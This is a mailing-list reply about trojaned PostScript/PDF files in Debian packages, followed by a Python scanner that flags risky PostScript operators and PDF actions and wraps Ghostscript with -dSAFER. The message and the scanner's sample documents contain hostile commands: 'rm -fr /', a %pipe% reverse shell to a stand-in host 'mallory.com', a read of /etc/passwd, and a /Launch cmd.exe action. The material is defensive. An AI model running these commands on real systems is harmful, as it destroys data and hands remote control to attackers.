
Re: pdf files in upstream tarball and -doc package



PostScript (.ps) is a "programming language".  If documents aren't
handled properly, it's a security issue.  This is different from the
buffer overflows in xpdf and such, which are also exploitable by
malicious documents.  Here, no compromise of the PS software (a la
stack smash) is necessary.  The PS software simply lets you run a
command (like rm -fr /, or sh </dev/tcp/mallory.com/1337 or whatever
else).

PDF is compressed PostScript, so I figure that the same applies.  I
wonder if it is lossy compression?  Anyways, I just found

  http://www.kde.org/info/security/advisory-20030409-1.txt

Justin

On Thu, Feb 10, 2005 at 11:47:51PM +0100, Miriam Ruiz wrote:
>  --- Justin Pryzby
> <justinpryzby@users.sourceforge.net> wrote: 
> 
> > PDF can be trojaned, so you should at least *provide* a way to
> > generate them from their sources, even if that makefile rule is
> > not called by default, and the additional build-dependencies are
> > just a note in debian/rules.
> 
> In case only PDF files were provided, or the PDF provided came from .doc
> files or something like that, is it OK to include them? I didn't
Strictly speaking, no, because it's a generated file, and you didn't
compile it from preferred-form source code.
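The check a packager or desktop integrator would want at this point, written as an added example that is not part of the thread and not Debian's or KDE's code: a triage scanner that tokenizes a PostScript file (skipping comments but honouring string literals, so a `(%pipe%...) (w) file` construction is not hidden by a `%`) and reports the operators through which a document can reach the host, plus the matching PDF-side check and the Ghostscript command line that refuses that access (`-dSAFER`). PDF content streams do not carry PostScript's `file`/`run` operators; the document-level hooks there are action dictionaries such as `/Launch`, `/JavaScript` and `/OpenAction`, which usually sit inside FlateDecode-compressed objects, so the PDF scanner inflates streams before matching. The operator list, the `safe_gs_argv` helper and all sample documents are this example's own constructions, not anything from the original message.

```python
"""Triage of PostScript/PDF documents before handing them to an interpreter.

Added example, not from the mailing-list thread. It flags the operators and
dictionary keys that let a document act on the host, and shows the Ghostscript
invocation that restricts them. All sample documents below are constructed.
"""
import re
import zlib

# PostScript operators that reach outside the page: file access, executing
# another file, environment lookup. Ghostscript's %pipe% device name turns a
# `(...) (w) file` call into a shell pipe when SAFER is not in effect.
PS_DANGEROUS = {"run", "file", "deletefile", "renamefile", "getenv"}
PS_PIPE = b"%pipe%"

# PDF action/annotation keys that launch programs, run scripts or carry files.
PDF_DANGEROUS = (b"/Launch", b"/JavaScript", b"/JS", b"/OpenAction", b"/AA",
                 b"/EmbeddedFile")

_DELIMS = set(b"()<>[]{}/%")
_WS = set(b" \t\r\n\f\x00")
_STREAM = re.compile(rb"stream\r?\n(.*?)\nendstream", re.S)


def ps_tokens(data: bytes):
    """Yield (kind, text) for executable names, literal names and strings.

    Comments are skipped, but a '%' inside a (...) string is string content,
    so '%pipe%' payloads are still seen. Good enough for triage, not a full lexer.
    """
    i, n = 0, len(data)
    while i < n:
        c = data[i]
        if c in _WS:
            i += 1
        elif c == 0x25:                       # '%' comment: skip to end of line
            while i < n and data[i] not in b"\r\n":
                i += 1
        elif c == 0x28:                       # '(' string, nested parens, \ escapes
            depth, j = 1, i + 1
            while j < n and depth:
                if data[j] == 0x5C:
                    j += 2
                    continue
                depth += (data[j] == 0x28) - (data[j] == 0x29)
                j += 1
            yield ("string", data[i + 1:j - 1])
            i = j
        elif c == 0x2F:                       # '/' literal name (e.g. /run load exec)
            j = i + 1
            while j < n and data[j] not in _DELIMS and data[j] not in _WS:
                j += 1
            yield ("name", data[i + 1:j])
            i = j
        elif c in _DELIMS:                    # brackets, <>, braces: irrelevant here
            i += 1
        else:                                 # executable name / number
            j = i
            while j < n and data[j] not in _DELIMS and data[j] not in _WS:
                j += 1
            yield ("exec", data[i:j])
            i = j


def scan_postscript(data: bytes) -> list[str]:
    """Return the host-reaching operators and %pipe% strings found, in order."""
    findings = []
    for kind, text in ps_tokens(data):
        if kind == "string" and PS_PIPE in text:
            findings.append("%pipe%")
        elif kind in ("exec", "name"):
            op = text.decode("latin-1")
            if op in PS_DANGEROUS:
                findings.append(("/" if kind == "name" else "") + op)
    return findings


def pdf_views(data: bytes):
    """Yield the raw file plus every stream that inflates as FlateDecode."""
    yield data
    for m in _STREAM.finditer(data):
        try:
            yield zlib.decompressobj().decompress(m.group(1))
        except zlib.error:
            continue                          # other filter or plain data; raw view covers it


def scan_pdf(data: bytes) -> list[str]:
    """Return the sorted set of dangerous PDF keys, including ones inside streams."""
    found = set()
    for view in pdf_views(data):
        for key in PDF_DANGEROUS:
            if re.search(re.escape(key) + rb"(?![A-Za-z0-9])", view):  # whole name only
                found.add(key.decode())
    return sorted(found)


def triage(data: bytes) -> list[str]:
    """Dispatch on the magic header; anything unrecognised is refused, not trusted."""
    if data.startswith(b"%PDF-"):
        return scan_pdf(data)
    if data.startswith(b"%!"):
        return scan_postscript(data)
    return ["unrecognised header; do not render"]


def safe_gs_argv(path: str) -> list[str]:
    """Ghostscript invocation that renders to nothing and passes -dSAFER, which
    makes the interpreter refuse the document's file and pipe access."""
    return ["gs", "-q", "-dSAFER", "-dBATCH", "-dNOPAUSE", "-sDEVICE=nullpage", path]


# Constructed samples. The comment in BENIGN_PS mentions both operators to show
# that comments are ignored; EVIL_PS uses the construction described in the thread.
BENIGN_PS = b"""%!PS-Adobe-3.0
% a comment mentioning run and file does not count
/Helvetica findfont 12 scalefont setfont
72 72 moveto (Hello, world) show
showpage
"""
EVIL_PS = b"""%!PS-Adobe-3.0
(%pipe%sh </dev/tcp/mallory.com/1337) (w) file closefile
(/etc/passwd) run
showpage
"""


def _pdf_with_stream(payload: bytes) -> bytes:
    """Minimal PDF whose only object is a FlateDecode stream around `payload`."""
    body = zlib.compress(payload)
    return (b"%PDF-1.4\n1 0 obj\n<< /Type /ObjStm /Filter /FlateDecode /Length "
            + str(len(body)).encode() + b" >>\nstream\n" + body
            + b"\nendstream\nendobj\n%%EOF\n")


BENIGN_PDF = _pdf_with_stream(b"<< /Type /Page /Contents 2 0 R >>")
EVIL_PDF = _pdf_with_stream(b"<< /Type /Action /S /Launch /F (cmd.exe) >>")

if __name__ == "__main__":
    for label, doc in (("benign ps", BENIGN_PS), ("evil ps", EVIL_PS),
                       ("benign pdf", BENIGN_PDF), ("evil pdf", EVIL_PDF)):
        print(label, triage(doc))
```

A clean scan is a reason to render with `safe_gs_argv`, not a reason to drop `-dSAFER`: the scanner only catches what is spelled out in the file, while the interpreter flag holds regardless of how the operators were assembled. Name literals are reported with a leading `/` because `/run load exec` reaches the same operator without ever spelling `run` as an executable token.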
